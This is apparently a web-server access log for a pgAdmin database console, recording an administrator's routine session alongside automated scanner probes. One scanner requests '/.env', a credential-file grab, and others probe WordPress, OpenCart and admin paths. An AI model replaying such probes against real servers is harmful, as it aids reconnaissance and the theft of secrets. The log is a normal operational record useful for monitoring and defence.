db.profibot.hu "/user_management/current_user.js?ver=91100" [Client 84.1.26.27] [Length 477] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:45:52 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:46:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:46:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:47:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:47:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:47:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:48:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:48:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:49:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:49:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:50:07 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:50:07 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:50:07 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:50:08 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:50:13 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:50:18 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:50:18 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:50:23 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:50:28 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:50:33 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:50:38 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:50:43 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:50:48 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:50:48 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:50:53 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:50:58 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:51:03 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:51:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:51:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:52:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:52:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:52:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:53:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:53:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:54:24 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:54:24 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:54:38 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:54:38 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:54:38 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:54:40 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:54:43 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:09:54:43 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2/16384?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 267] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[27/Jan/2026:09:54:43 +0000] - 200 200 - DELETE https db.profibot.hu "/sqleditor/close/3857941" [Client 84.1.26.27] [Length 74] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[27/Jan/2026:10:01:03 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 3.209.212.23] [Length 213] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" "-" +[27/Jan/2026:10:01:03 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 3.209.212.23] [Length 2389] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36" "-" +[28/Jan/2026:03:45:43 +0000] - 404 404 - GET https db.profibot.hu "/robots.txt" [Client 74.7.175.158] [Length 184] [Gzip 1.20] [Sent-to pgadmin_ui] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[28/Jan/2026:03:45:44 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 74.7.227.44] [Length 213] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-" +[28/Jan/2026:03:45:44 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 74.7.227.44] [Length 2310] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://db.profibot.hu/" +[28/Jan/2026:12:05:31 +0000] - 404 404 - GET https db.profibot.hu "/robots.txt" [Client 35.95.1.110] [Length 184] [Gzip 1.20] [Sent-to pgadmin_ui] "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)" "-" +[28/Jan/2026:12:05:32 +0000] - 404 404 - GET https db.profibot.hu "/enhancecp" [Client 35.95.1.110] [Length 184] [Gzip 1.20] [Sent-to pgadmin_ui] "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)" "-" +[28/Jan/2026:13:19:05 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 20.6.76.96] [Length 213] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:05 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 20.6.76.96] [Length 2390] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "https://db.profibot.hu" +[28/Jan/2026:13:19:05 +0000] - 404 404 - GET https db.profibot.hu "/wp-json/wc/v3" [Client 20.6.76.96] [Length 184] [Gzip 1.20] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:05 +0000] - 404 404 - GET https db.profibot.hu "/index.php?route=checkout/cart" [Client 20.6.76.96] [Length 184] [Gzip 1.20] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:06 +0000] - 404 404 - GET https db.profibot.hu "/index.php?route=account/register" [Client 20.6.76.96] [Length 184] [Gzip 1.20] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:06 +0000] - 404 404 - GET https db.profibot.hu "/index.php?route=account/login" [Client 20.6.76.96] [Length 184] [Gzip 1.20] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:06 +0000] - 404 404 - GET https db.profibot.hu "/index.php?route=checkout/checkout" [Client 20.6.76.96] [Length 184] [Gzip 1.20] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:06 +0000] - 404 404 - GET https db.profibot.hu "/admin/" [Client 20.6.76.96] [Length 184] [Gzip 1.20] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:13:19:06 +0000] - 404 404 - GET https db.profibot.hu "/wp-json/" [Client 20.6.76.96] [Length 184] [Gzip 1.20] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[28/Jan/2026:23:33:52 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.others.js?ver=91100" [Client 37.76.10.148] [Length 2351296] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[28/Jan/2026:23:33:52 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 37.76.10.148] [Length 3738] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[28/Jan/2026:23:33:52 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 37.76.10.148] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[29/Jan/2026:01:35:56 +0000] - 404 404 - GET https db.profibot.hu "/.env" [Client 204.76.203.25] [Length 207] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[29/Jan/2026:09:00:59 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 84.1.26.27] [Length 213] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:09:00:59 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 84.1.26.27] [Length 2495] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[29/Jan/2026:09:01:00 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[29/Jan/2026:09:01:00 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 84.1.26.27] [Length 3738] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[29/Jan/2026:09:01:06 +0000] - 302 302 - POST https db.profibot.hu "/authenticate/login" [Client 84.1.26.27] [Length 199] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[29/Jan/2026:09:01:06 +0000] - 200 200 - GET https db.profibot.hu "/login" [Client 84.1.26.27] [Length 2492] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[29/Jan/2026:09:01:06 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 84.1.26.27] [Length 3738] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/login" +[29/Jan/2026:09:01:06 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 84.1.26.27] [Length 321] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/login" +[29/Jan/2026:09:01:19 +0000] - 302 302 - POST https db.profibot.hu "/authenticate/login" [Client 84.1.26.27] [Length 205] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/login" +[29/Jan/2026:09:01:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/" [Client 84.1.26.27] [Length 2933] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/login" +[29/Jan/2026:09:01:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/browser.css?ver=91100" [Client 84.1.26.27] [Length 4180] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:19 +0000] - 200 200 - GET https db.profibot.hu "/user_management/current_user.js?ver=91100" [Client 84.1.26.27] [Length 477] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:19 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/utils.js?ver=91100" [Client 84.1.26.27] [Length 3131] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:09:01:19 +0000] - 200 200 - GET https db.profibot.hu 